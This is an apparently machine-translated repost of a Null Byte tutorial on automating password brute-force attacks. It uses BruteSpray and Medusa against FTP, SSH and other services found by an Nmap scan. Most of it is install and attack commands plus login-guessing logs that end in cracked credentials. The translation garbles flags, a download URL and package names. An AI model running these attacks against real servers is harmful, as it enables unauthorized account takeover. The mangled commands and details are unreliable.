قالب وردپرس درنا توس
Home / Tips and Tricks / Automating Brute-Force Attacks for Nmap Scans «Null Byte :: WonderHowTo

Automating Brute-Force Attacks for Nmap Scans «Null Byte :: WonderHowTo



The first use of Hydra, Ncrack and other brute-forcing tools to crack passwords can be frustrating and confusing. To simplify the process, let's discuss automating and optimizing brute-force attacks for potentially vulnerable services such as SMTP, SSH, IMAP, and FTP discovered by Nmap, a popular network scanning utility.

BruteSpray, developed by Jacob Robles and Shane Young is a Python script that is capable of processing an Nmap scan output and detecting brute force attacks Automate services using Medusa, a popular brute-forcing tool. BruteSpray is the much-needed nexus that combines Nmap scans and brute-force attacks.

Step 1: Set Up BruteSpray & Medusa

An older version of BruteSpray is in the Kali repositories . To avoid possible confusion, all previously installed versions of BruteSpray should be removed with the following command apt-get .

  apt-get autoremove brutespray

Read package lists ... Done
Create dependency tree
Status information is read ... Done
Package & # 39; brute spray & # 39; is not installed and will not be removed
0 updated, 0 reinstalled, 0 removed and 166 not updated. 

Then clone the BruteSpray repository.

  git clone https://github.com/x90skysn3k/brutespray.git

Cloning in "brutepray" ...
Remote: count objects: 395, done.
Remote: Compressing objects: 100% (13/13), done.
Remote: Total 395 (Delta 8), reused 19) Delta 7), reused 375 package
Reception objects: 100% (395/395), 70.33 KiB | 178.00 KiB / s, finished.
Resolution of deltas: 100% (155/155), done. 

Then -CD in the "brutespray" directory and use pip a tool to install and manage Python packages. to install the BruteSpray dependencies. This command is required to run BruteSpray. The argument -r tells pip to install the dependencies found in the Requirements.txt file.

  cd brutespray /
pip install -r Requirements.txt

Requirement already met: argcomplete == 1.8.1 in /usr/local/lib/python2.7/dist.packages (from -r Requirements.txt (line 1))
Requirement already met: pyscreenshot == 0.4.2 in /usr/local/lib/python2.7/dist.packages (from -r Requirements.txt (line 2))
Requirement already met: pytesseract == 0.1.7 in /usr/local/lib/python2.7/dist.packages (from -r Requirements.txt (line 3))
Requirement already met: lxml == 3.8.0 in /usr/local/lib/python2.7/dist.packages (from -r Requirements.txt (line 4))
Requirement already met: Requirements == 2.12.4 in /usr/local/lib/python2.7/dist.packages (from -r Requirements.txt (line 5))
Requirement already fulfilled: Cushion == 4.2.1 in /usr/local/lib/python2.7/dist.packages (from -r Requirements.txt (line 6))
Requirement already met: beautifulsoup4 == 4.6.0 in /usr/local/lib/python2.7/dist.packages (from -r Requirements.txt (line 7))
Requirement already met: EasyProcess in /usr/local/lib/python2.7/dist.packages (from pyscreenshot == 0.4.2 -> - r Requirements.txt (line 2))
Requirement already met: Olefile in /usr/local/lib/python2.7/dist.packages (from Pillow == 4.2.1 -> - r Requirements.txt (line 6)) 

Lastly install Medusa. This can be done with the following command.

  apt-get install medusa

Read package lists ... Done
Create dependency tree
Status information is read ... Done
Medusa is already the latest version (2.2-5).
0 updated, 0 reinstalled, 0 removed and 166 not updated. 

The – help argument can be used to verify that BruteSpray is working properly and to display the available options.

  ./brutespray.py --help

Created by: Shane Young / @ x90skysn3k && Jacob Robles / @ shellfail
Usage: brutespray.py [-h] [-f FILE] [-o OUTPUT] [-s SERVICE] [-t THREADS]
                     [-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME]
                     [-p PASSWORD] [-c] [-i] [-m]

  Usage: Python brutespray.py 

optional arguments:
-h, --help View and exit this help message

Menu items:
-f FILE, --file FILE GNMAP or XML file to parse
-o OUTPUT, --out OUTPUT
Directory with successful attempts
-s SERVICE, --service SERVICE
specify the attacking service
-t THREAD, - THREAD
Number of medusa threads
-T HOSTS, --host HOSTS
Number of hosts to be tested simultaneously
-U USERLIST, --userlist USERLIST
refer to a custom username file
-P PASSLIST --passlist PASSLIST
refer to a user-defined password file
-u USERNAME, --username USERNAME
Enter a single user name
-p PASSWORD, --password PASSWORD
Enter a single password
-c, - Continuous brute forcing for success
-i interactive interactive mode
-m, --modules outputs a list of available modules to delete them 

This is all to download BruteSpray and install dependencies – no changes or configurations are required.

Other prerequisites that may be helpful in this tutorial include Nmap (of course), a general understanding of how Nmap works, and a simple word list of attacks that guess a password. Nmap can be installed and downloaded with the following command if you do not already have it.

  apt-get install nmap

Read package lists ... Done
Create dependency tree
Status information is read ... Done
nmap is already the latest version (7.70 + dfsg1-0kali2).
0 updated, 0 reinstalled, 0 removed and 164 not updated. 

The word list used in this manual can be downloaded with the following command. Of course, you can use any word list that you want to use from leaked password databases, other online word lists, or custom word-launcher tools such as Mentalist, CeWL, and Crunch.

  wget & # 39; https: //raw.githubusercontent. DE / tokyoneon / 1wordlist / master / 1wordlist2rulethem% 40ll.txt & # 39;

--2018-04-12 12: 25: 36 - https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com) ... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connection to raw.githubusercontent.com (raw.githubusercontent.com) | 151.101.0.133 |: 443 ... made.
HTTP request sent, waiting for response ... 200 OK
Length: 25585 (25K) [text/plain]
Save as: "1wordlist2rulethem@ll.txt"

1wordlist2rulethem @ 100% [===================>] 24.99K --.- KB / s in 0.04 s

2018-04-12 12:25:36 (651 KB / s) - & # 39; 1wordlist2rulethem@ll.txt' has been saved [25585/25585]

Step 2: Create Nmap output files

BruteSpray requires an Nmap output file to work. These files can be created using the Nmap arguments -oX or -oG as shown in the following Nmap command. The -sV means that open ports are examined to determine the service and version information.

The use of -oG is the main argument here. It saves the Nmap output in a local file in grepable format. This allows BruteSpray to effectively handle the services and ports found on the destination server. Similarly, the argument -oX stores the Nmap output in an XML output that is also supported by BruteSpray, but is less readable.

  nmap -sVTU -p ports targetServer -oG filename.gnmap [19659006] Here is my example for this command and the output: 

  nmap -sVTU -p21,22,137,161 1X.XXX.XXX.103 -o tokyoneon. gnmap

Starting Nmap 7.70 (https://nmap.org)
Nmap scan report for 1X.XXX.XXX.103
Host is up and running (latency 0.00018s).

PORT STATE SERVICE VERSION
21 / tcp open ftp vsftpd 3.0.3
22 / tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; Protocol 2.0)
137 / tcp closed netbios-ns
161 / tcp closed snmp
21 / udp closed ftp
22 / udp closed ssh
137 / udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
161 / udp open snmp SNMPv1 server; SNMPv3 server from net-snmp (public)
MAC Address: 6C: DB: XX: XX: XX: XX (XXXXX)
Service Info: Host: XXXXX; Operating Systems: Unix, Linux; CPE: cpe: / o: linux: linux_kernel

Service detection performed. Please report incorrect results at https://nmap.org/submit/.
Nmap finished: 1 IP address (1 host up) scanned in 0.60 seconds 

Make sure you replace "ports" with the ports you want to scan, "TargetServer" with the IP address of your destination and "filename" by the name you want to give to the file. After execution, the newly created .gnmap file can be viewed using the command cat .

  cat filename.gnmap 

After running my sample command:

  cat tokyononon.gnmap

# Nmap 7.70 Scan initiated Thu Apr 12 18:34:07 2018 as: nmap -sVTU -p21,22,137,161 -o tokyoneon.gnmap 1X.XXX.XXX.103
Host: 1X.XXX.XXX.103 () Status: High
Host: 1X.XXX.XXX.103 () Ports: 21 / open / tcp // ftp // vsftpd 3.0.3 /, 22 / open / tcp // ssh // OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; Protocol 2.0) /, 137 / closed / tcp // netbios-ns ///, 161 / closed / tcp // snmp ///, 21 / closed / udp // ftp ///, 22 / closed / udp // ssh ///, 137 / open / udp // netbios-ns // samba nmbd netbios-ns (workgroup: WORKGROUP) /, 161 / open / udp // snmp // SNMPv1 server; SNMPv3 server from net-snmp (public WORKGROUP) /
# Nmap, created on Thu Apr 12 18:35:55 ​​2018 - 1 IP address (1 host up) was scanned in 0.60 seconds 

Note the "open" ports discovered by Nmap as these services -force attacks are now available for automated brute.

Step 3: Automating Brute Force Attacks with BruteSpray

BruteSpray currently supports nearly two dozen services by default. The supported services can be displayed with the argument - modules . These include SSH, FTP, Telnet, VNC, MsSQL, MySQL, PostgreSQL, RSH, IMAP, NNTP, pcAnywhere, POP3, rexec, rlogin, SMBNT, SMTP, SVN, vmauthd and SNMP.

. modules

Created by: Shane Young / @ x90skysn3k && Jacob Robles / @ shellfail
Supported Services:

ssh
ftp
Telnet
vnc
mssql
mysql
postgresql
rsh
imap
nntp
pcanywhere
pop3
rexec
rlogin
smbnt
smtp
svn
vmauthd
snmp 

1. Interactive Mode

The argument -i can be used to enable an interactive mode a guided mode designed to increase usability.

  ./brutespray.py - file filename.gnmap -i

----------------------------------------

./brutespray.py - file tokyoneon.gnmap -i

Created by: Shane Young / @ x90skysn3k && Jacob Robles / @ shellfail

Welcome to the interactive mode!

WARNING: Leaving an option blank will leave it blank and refer to the default setting

Available services for brute-force:
Service: FTP on port 21 with 1 hosts
Service: snmp on port 161 with 1 hosts
Service: ssh on port 22 with 1 hosts

Enter the services you want to brutalize - default all (ssh, ftp etc): 

Just follow the instructions and the brute force attack begins.

  Enter services you want to use - default all (ssh, ftp, etc): ftp
Enter the number of parallel threads (default is 2): 1
Enter the number of parallel hosts to check per service (default is 1): 1
Do you want to specify a word list? (j / n): n
Do you want to specify a single user name or password (y / n): y
Enter a username: user
Enter a password:

Be sure to use the right number of threads (-t) and parallel hosts (-T) before starting on raw animals.
The output is written to the folder: ./brutespray-output/ 

Brute-forcing ...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: 123456 (1 of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: 123456789 (2 out of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: Password (3 out of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: Success (4 out of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: asdfghjkl (5 out of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: 11111111 (6 out of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: iloveyou (7 out of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: letmein (8 of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: wonderhow2 (9 of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 User: User Password: wonderhow2 [SUCCESS]

2. Target Individual Services

Targeting a single service can be done using the - Service argument and specifying the protocol. If the argument - username is omitted when using the service BruteSpray uses the default list of usernames in the wordlist / ssh / user file. This list of usernames can be changed at any time.

  ./brutespray.py --file filename.gnmap --service ssh

----------------------------------------

./brutespray.py - file tokyoneon.gnmap --service ssh

Created by: Shane Young / @ x90skysn3k && Jacob Robles / @ shellfail

Be sure to use the right number of threads (-t) and parallel hosts (-T) before starting on raw animals.
The output is written to the folder: ./brutespray-output/ 

Brute-forcing ...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: 123456 (1 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: 123456789 (2 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: Password (3 out of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: Success (4 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: asdfghjkl (5 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: 11111111 (6 out of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: iloveyou (7 out of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: letmein (8 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 1 completed) Password: wonderhow2 (9 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (2 of 3, 1 completed) Password: 123456 (1 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (2 of 3, 1 completed) Password: 123456789 (2 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (2 of 3, 1 completed) Password: 123456 (1 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (2 of 3, 1 completed) Password: Password (3 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (2 out of 3, 1 completed) Password: 123456789 (2 out of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (2 out of 3, 1 completed) Password: Password (3 out of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (2 of 3, 1 completed) Password: Success (4 out of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (2 out of 3, 1 completed) Password: asdfghjkl (5 out of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (2 of 3, 1 completed) Password: Success (4 out of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (3 of 3, 1 completed) Password: 11111111 (6 out of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (3 of 3, 1 completed) Password: asdfghjkl (5 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (3 out of 3, 1 completed) Password: 11111111 (6 out of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (3 of 3, 1 completed) Password: iloveyou (7 out of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (3 of 3, 1 completed) Password: letmein (8 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (3 out of 3, 1 completed) Password: iloveyou (7 out of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (3 of 3, 1 completed) Password: wonderhow2 (9 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (3 of 3, 2 completed) Password: letmein (8 of 9 completed)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (3 out of 3, 2 completed) Password: wonderhow2 (9 out of 9 completed)

CCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 User: User Password: wonderhow2 [SUCCESS]

3. Configuring custom word lists and user names (optional)

There are small built-in word lists and user name lists that are automatically used when a particular service is brutally enforced. For example, the password file in the wordlist / ssh / directory contains passwords used when brute forcing SSH services. Each supported service has its own dedicated directory in the wordlist / directory.

  ls -F word /

ftp / mssql / nntp / postgres / rlogin / smbnt / ssh / telnet / vnc /
imap / mysql / pcanywhere / rexec / rsh / smtp / svn / vmauthd / 

It is possible to manually change the built-in word lists using the command below cp to copy a custom word list. [19659005] cp /path/to/customPasswords.list wordlist / ssh / password

The built-in user name lists can also be changed with the following command.

  cp /path/to/customUser.list wordlist / vnc / user 

Alternatively, custom password and user name lists can be used from the command line with the arguments and – username .

  ./brutespray.py --file filename.gnmap --username UsernameHere --passlist /path/to/desired/passwords.list --service ftp

-------------------------------------------------- -------------------------------------------------- -------------------

./brutespray.py - file tokyoneon.gnmap --passlist /root/to/Desktop/passwords.list --service ftp

Created by: Shane Young / @ x90skysn3k && Jacob Robles / @ shellfail
Be sure to use the right number of threads (-t) and parallel hosts (-T) before starting on raw animals.
The output is written to the folder: ./brutespray-output/ 

Brute-forcing ...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: 123456 (1 of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: 123456789 (2 out of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: Password (3 out of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: Success (4 out of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: asdfghjkl (5 out of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: 11111111 (6 out of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: iloveyou (7 out of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: letmein (8 of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: User (1 of 1, 0 completed) Password: wonderhow2 (9 of 9 completed)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 User: User Password: wonderhow2 [SUCCESS] 

These are just a few examples. If you need more help, you can find me in the comments below or on Twitter @tokyoneon_ .

Don & # 39; t Miss: How To Easily Recognize CVEs With Nmap Scripts [19659054] Cover Picture Of Jefferson Santos / PEXELS And Screenshots Of Tokyoneon / Null Bytes




Source link